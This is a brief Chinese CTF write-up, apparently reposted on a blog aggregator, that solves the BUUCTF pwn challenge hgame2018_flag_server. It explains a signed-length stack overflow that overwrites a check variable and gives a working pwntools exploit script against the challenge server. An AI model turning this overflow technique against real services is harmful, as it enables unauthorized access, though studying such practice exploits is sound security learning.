這一題主要就分析清楚程序的執(zhí)行流程就可以做出來(lái)了;

v10=1就可以得出答案;


由于v5=-1;輸入長(zhǎng)度可以很大,造成溢出,點(diǎn)進(jìn)去s1

溢出覆蓋到v10 滿足條件

from pwn import* p = remote("node3.buuoj.cn",26244) p.sendlineafter("your username length: ",'-1') payload='a'*0x40+p32(1) p.sendlineafter("whats your username?",payload) p.interactive()

總結(jié)

以上是生活随笔為你收集整理的BUUCTF(pwn)hgame2018_flag_server(简单的栈溢出)的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。